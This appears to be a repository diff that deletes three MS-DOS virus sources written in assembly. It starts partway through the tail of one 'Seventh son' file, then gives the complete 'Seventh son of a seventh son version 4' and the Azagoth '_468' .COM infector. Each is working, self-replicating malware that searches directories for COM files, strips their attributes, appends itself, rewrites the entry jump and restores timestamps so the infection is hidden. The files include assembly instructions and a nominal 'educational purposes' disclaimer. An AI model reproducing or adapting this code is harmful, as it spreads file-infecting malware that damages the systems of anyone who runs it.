mov ah,4Fh ;find next file
int 21
jnc infloop
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
push cs
push cs
pop ds
pop es
mov ax,0100h ;put old start-adres on stack
push ax
ret
;****************************************************************************
;* Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
;****************************************************************************
infect: cld
mov ax,4300h ;ask attributes
int 21
push cx
xor cx,cx ;clear flags
call setattr
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
lea dx,[bp+offset begbuf-4]
mov ah,3fh
int 21
mov al,byte ptr [bp+begbuf-4] ;already infected?
cmp al,4Dh
je return2
cmp al,5Ah ;or a weird EXE?
je return2
call endptr ;get file-length
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
lea dx,[bp+offset start-4]
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
sub ax,4 ;calculate new start-adres
mov word ptr [bp+newbeg-2],ax
call beginptr ;write new begin of file
mov cx,4
lea dx,[bp+offset newbeg-4]
mov ah,40h
int 21
inc byte ptr [si] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: pop cx ;restore file-attribute
; call setattr
; ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: mov dx,word ptr [bp+offset nameptr-4]
mov ax,4301h
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov ax,4200h ;go to begin of file
jmp short ptrvrdr
endptr: mov ax,4202h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
int 21
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
begbuf db 0CDh, 20h, 0, 0
newbeg db 4Dh, 0E9h, 0, 0
nameptr dw ?
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
grandfather db 0
father db 0
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin

MSDOS/0 - 9 Index/Virus.MSDOS.Unknown.7son4.asm
-218
View File
@@ -1,218 +0,0 @@
;****************************************************************************
;* Seventh son of a seventh son version 4
;*
;* Compile with MASM 4.0
;* (other assemblers will probably not produce the same result)
;*
;* Disclaimer:
;* This file is only for educational purposes. The author takes no
;* responsibility for anything anyone does with this file. Do not
;* modify this file!
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:cseg,ss:cseg
.RADIX 16
FILELEN equ end - start
MINTARGET equ 1000d
MAXTARGET equ -(FILELEN+40)
;****************************************************************************
;* Dummy program (infected)
;****************************************************************************
org 100
begin: db 4Dh ;virus mark
db 0E9h, 4, 0 ;jump to virus entry
;****************************************************************************
;* Begin of the virus
;****************************************************************************
start: db 0CDh, 20h, 0, 0
cld
mov si,0100h
push si ;push new IP on stack
mov di,si
add si,[si+2] ;si -> start
push si ;restore original begin
movsw
movsw
pop si
mov ax,3300h ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov ax,3524h ;get int24 vector
int 21
push bx
push es
lea dx,[si+(offset ni24 - 0104)] ;set new int24 vector
mov ah,25h
push ax
int 21
mov ah,2Fh ;get DTA adres
int 21
push es
push bx
add dx,070h ;set new DTA adres
mov ah,1Ah
int 21
add dx,1Eh
push dx
lea di,[si+(offset generation-0104)] ;check generation
cmp [di],0707h
jne verder
lea dx,[di+2] ;7th son of a 7th son!
mov ah,09h
int 21
verder: mov ax,[di] ;update generations
xchg ah,al
mov al,1
mov [di],ax
lea dx,[di+33d] ;find first COM-file
xor cx,cx
mov ah,4Eh
infloop: int 21
pop dx
jc stop
push dx
xor cx,cx ;clear read-only-arttribute
mov ax,4301
int 21
jc return1
mov ax,3D02h ;open the file
int 21
jc return1
xchg bx,ax
mov ax,5700h ;get file date & time
int 21
push cx
push dx
mov cx,4 ;read begin of file
mov dx,si
mov ah,3fh
int 21
cmp byte ptr [si],4Dh ;already infected or an EXE?
je return2
cmp byte ptr [si],5Ah ;or a weird EXE?
je return2
mov al,2 ;go to end of file
call seek
cmp ax,MAXTARGET ;check length of file
jnb return2
cmp ax,MINTARGET
jbe return2
push ax
mov cx,FILELEN ;write program to end of file
mov ah,40h
int 21
cmp ax,cx ;are all bytes written?
pop ax
jnz return2
xchg ax,bp
mov al,0 ;go to begin of file
call seek
mov word ptr [si],0E94Dh ;write mark and jump-command
mov word ptr [si+2],bp
mov ah,40h
int 21
inc byte ptr [di] ;number of next son
return2: pop dx ;restore file date & time
pop cx
mov ax,5701h
int 21
mov ah,3Eh ;close the file
int 21
return1: mov ah,4Fh ;find next file
jmp short infloop
stop: pop dx ;restore DTA adres
pop ds
mov ah,1Ah
int 21
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
push cs
push cs
pop ds
pop es
ret
seek: mov ah,42
cwd
int21: xor cx,cx
int 21
mov cl,4
mov dx,si
ret
;****************************************************************************
;* Interupt handler 24
;****************************************************************************
ni24: mov al,03
iret
;****************************************************************************
;* Data
;****************************************************************************
generation db 1,1
sontxt db 'Seventh son of a seventh son',0Dh, 0Ah, '$'
filename db '*.COM',0
db '‚¨°³±'
end:
cseg ends
end begin

MSDOS/0 - 9 Index/Virus.MSDOS.Unknown._468.asm
-257
View File
@@ -1,257 +0,0 @@
; virus from ALT-11 mag
; ---------------------------------------
;
; Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files. If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found. (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; ---------------------------------------------------------------------------
.model tiny
.code
org 100h ; adjust for psp
start:
call get_disp ; push ip onto stack
get_disp:
pop bp ; bp holds current ip
sub bp, offset get_disp ; bp = code displacement
; original label offset is stored in machine code
; so new (ip) - original = displacement of code
save_path:
mov ah, 47h ; save cwd
xor dl, dl ; 0 = default drive
lea si, [bp + org_path]
int 21h
get_dta:
mov ah, 2fh
int 21h
mov [bp + old_dta_off], bx ; save old dta offset
set_dta: ; point to dta record
mov ah, 1ah
lea dx, [bp + dta_filler]
int 21h
search:
mov ah, 4eh ; find first file
mov cx, [bp + search_attrib] ; if successful dta is
lea dx, [bp + search_mask] ; created
int 21h
jnc clear_attrib ; if found, continue
find_next:
mov ah, 4fh ; find next file
int 21h
jnc clear_attrib
still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd ..
int 21h
jnc search
jmp bomb ; at root, no more files
clear_attrib:
mov ax, 4301h
xor cx, cx ; get rid of attributes
lea dx, [bp + dta_file_name]
int 21h
open_file:
mov ax, 3D02h ; AL=2 read/write
lea dx, [bp + dta_file_name]
int 21h
xchg bx, ax ; save file handle
; bx won't change from now on
check_if_command_com:
cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
mov cx, 11 ; length of 'COMMAND.COM'
repe cmpsb ; repeat while equal
jne check_if_infected
jmp close_file
check_if_infected:
mov dx, word ptr [bp + dta_file_size] ; only use first word since
; COM file
sub dx, 2 ; file size - 2
mov ax, 4200h
mov cx, 0 ; cx:dx ptr to offset from
int 21h ; origin of move
mov ah, 3fh ; read last 2 characters
mov cx, 2
lea dx, [bp + last_chars]
int 21h
mov ah, [bp + last_chars]
cmp ah, [bp + virus_id]
jne save_3_bytes
mov ah, [bp + last_chars + 1]
cmp ah, [bp + virus_id + 1]
jne save_3_bytes
jmp close_file
save_3_bytes:
mov ax, 4200h ; 00=start of file
xor cx, cx
xor dx, dx
int 21h
mov ah, 3Fh
mov cx, 3
lea dx, [bp + _3_bytes]
int 21h
goto_eof:
mov ax, 4202h ; 02=End of file
xor cx, cx ; offset from origin of move
xor dx, dx ; (i.e. nowhere)
int 21h ; ax holds file size
; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, 3 ; file size - 3 = jmp disp.
mov [bp + jmp_disp], ax
write_code:
mov ah, 40h
mov cx, virus_length ;*** equate
lea dx, [bp + start]
int 21h
goto_bof:
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h
write_jmp: ; to file
mov ah, 40h
mov cx, 3
lea dx, [bp + jmp_code]
int 21h
inc [bp + infections]
restore_date_time:
mov ax, 5701h
mov cx, [bp + dta_file_time]
mov dx, [bp + dta_file_date]
int 21h
close_file:
mov ah, 3eh
int 21h
restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attributes
mov ax, 4301h
lea dx, [bp + dta_file_name]
int 21h
done_infecting?:
mov ah, [bp + infections]
cmp ah, [bp + max_infections]
jz bomb
jmp find_next
bomb:
; cmp bp, 0
; je restore_path ; original run
;
;---- Stuff deleted
restore_path:
mov ah, 3bh ; when path stored
lea dx, [bp + root] ; '\' not included
int 21h
mov ah, 3bh ; cd to original path
lea dx, [bp + org_path]
int 21h
restore_dta:
mov ah, 1ah
mov dx, [bp + old_dta_off]
int 21h
restore_3_bytes: ; in memory
lea si, [bp + _3_bytes]
mov di, 100h
cld ; auto-inc si, di
mov cx, 3
rep movsb
return_control_or_exit?:
cmp bp, 0 ; bp = 0 if original run
je exit
mov di, 100h ; return control back to prog
jmp di ; -> cs:100h
exit:
mov ax, 4c00h
int 21h
;-------- Variable Declarations --------
old_dta_off dw 0 ; offset of old dta address
;-------- dta record
dta_filler db 21 dup (0)
dta_file_attrib db 0
dta_file_time dw 0
dta_file_date dw 0
dta_file_size dd 0
dta_file_name db 13 dup (0)
;--------
search_mask db '*.COM',0 ; files to infect: *.COM
search_attrib dw 00100111b ; all files a,s,h,r
com_com db 'COMMAND.COM'
previous_dir db '..',0
root db '\',0
org_path db 64 dup (0) ; original path
infections db 0 ; counter
max_infections db 1
_3_bytes db 0, 0, 0
jmp_code db 0E9h
jmp_disp dw 0
last_chars db 0, 0 ; do last chars = ID ?
virus_id db 'AZ'
eov: ; end of virus
virus_length equ offset eov - offset start
end start